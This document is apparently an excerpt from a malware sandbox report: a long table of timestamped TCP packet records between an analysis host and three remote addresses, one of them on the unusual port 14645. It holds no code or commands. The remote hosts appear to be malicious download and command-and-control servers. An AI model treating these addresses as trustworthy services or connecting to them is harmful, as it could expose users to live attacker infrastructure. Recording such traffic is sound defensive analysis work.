                                                                      Aug 28, 2024 06:54:13.580467939 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.580476046 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.580478907 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.580503941 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.581069946 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581082106 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581091881 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581115007 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.581141949 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581152916 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581163883 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581176043 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581187010 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.581204891 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.581283092 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581295013 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581310034 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581322908 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581332922 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.581335068 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581346035 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581357956 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581363916 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.581409931 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.581983089 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.582000017 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.582010031 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.582046986 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.596020937 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596033096 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596044064 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596070051 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.596097946 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596110106 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596120119 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596146107 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.596205950 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596218109 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596229076 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596246004 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596265078 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.596275091 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.596293926 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596307993 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596350908 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.596756935 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596769094 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596812963 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.596842051 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596921921 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596932888 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596944094 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596962929 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.597141981 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597153902 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597163916 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597192049 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.597259998 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597271919 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597281933 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597291946 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597301960 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.597325087 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.597358942 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597369909 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597381115 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597429037 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.597867012 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597877979 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597887993 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597912073 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.597970963 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597982883 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597994089 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598005056 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598011017 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.598036051 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.598074913 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598084927 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598095894 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598099947 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598119020 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.598140001 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.598582983 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598637104 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598648071 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598680973 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.598701954 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598712921 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598723888 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598737955 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598747015 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.598767042 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.598849058 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598860025 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598869085 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598880053 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598891973 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598892927 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.598901033 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598937035 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.599492073 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599502087 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599513054 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599539995 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.599575043 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599586964 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599597931 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599610090 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599617004 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.599647045 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.599724054 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599735022 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599745035 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599756002 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599766970 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599776030 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.599776983 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599783897 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.600425959 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.600436926 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.600447893 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.600474119 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.600493908 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.675467014 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.857228041 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:13.862011909 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:13.862076998 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:13.871965885 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:13.876712084 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:14.415477991 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:14.551207066 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:14.551269054 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:14.575594902 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:14.580363035 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:14.580444098 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:14.585195065 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:14.585257053 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:14.590008020 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:15.265389919 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:15.267187119 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:15.271971941 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:15.364438057 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:15.368012905 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:15.372737885 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:15.374420881 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:15.378243923 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:15.383003950 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:15.425385952 CEST4917580192.168.2.22178.237.33.50
                                                                      Aug 28, 2024 06:54:15.430157900 CEST8049175178.237.33.50192.168.2.22
                                                                      Aug 28, 2024 06:54:15.430222988 CEST4917580192.168.2.22178.237.33.50
                                                                      Aug 28, 2024 06:54:15.430372953 CEST4917580192.168.2.22178.237.33.50
                                                                      Aug 28, 2024 06:54:15.435092926 CEST8049175178.237.33.50192.168.2.22
                                                                      Aug 28, 2024 06:54:15.565187931 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:15.909461021 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.039000988 CEST8049175178.237.33.50192.168.2.22
                                                                      Aug 28, 2024 06:54:16.039141893 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.039220095 CEST4917580192.168.2.22178.237.33.50
                                                                      Aug 28, 2024 06:54:16.039220095 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.043598890 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.048338890 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.048523903 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.049653053 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.053250074 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.054395914 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277117014 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277126074 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277136087 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277173996 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277173042 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.277185917 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277221918 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.277295113 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277309895 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277321100 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277332067 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277343035 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277345896 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.277353048 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277373075 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.277384996 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.277769089 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.281960011 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.282001972 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.282011032 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.365916967 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.365964890 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.365967989 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.366476059 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.366516113 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.366517067 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.366529942 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.366600990 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.366612911 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.366624117 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.366635084 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.366658926 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.366955996 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.367001057 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.367010117 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.367047071 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.367074966 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.367085934 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.367095947 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.367126942 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.367894888 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.367953062 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.367963076 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.367985964 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.368036032 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.368045092 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.368055105 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.368071079 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.368829966 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.370695114 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.370743036 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.370753050 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.370780945 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.370789051 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.370800018 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.370826960 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.371082067 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.455319881 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455331087 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455370903 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.455375910 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455388069 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455427885 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.455471992 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455483913 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455497026 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455507994 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455524921 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.455679893 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455693007 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455703974 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455717087 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455719948 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.455730915 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455750942 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.455795050 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455830097 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455841064 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.455847025 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455864906 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455904961 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.455921888 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455938101 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.455961943 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.456279039 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.456291914 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.456310987 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.456326962 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.456358910 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.456371069 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.456381083 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.456393003 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.456409931 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.456423044 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.456429005 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.456437111 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.456448078 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.456465006 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.456985950 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.456999063 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.457010031 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.457024097 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.457036018 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.457048893 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.457062006 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.457097054 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.457859039 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.736099005 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736109972 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736121893 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736131907 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736144066 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.736167908 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.736180067 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736191034 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736200094 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736211061 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736219883 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.736221075 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736232996 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736243010 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.736244917 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736253977 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.736257076 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736269951 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736275911 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.736282110 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736290932 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736300945 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736310005 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.736310005 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736329079 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.736605883 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736617088 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736625910 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736637115 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736644030 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.736648083 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736658096 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.736690044 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.736782074 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736793041 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736800909 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736810923 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736824036 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.736824036 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736835957 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736845016 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.736846924 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736859083 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736870050 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736881018 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736886024 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.736890078 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.736897945 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.736903906 CEST1464549174192.210.214.9192.168.2.22
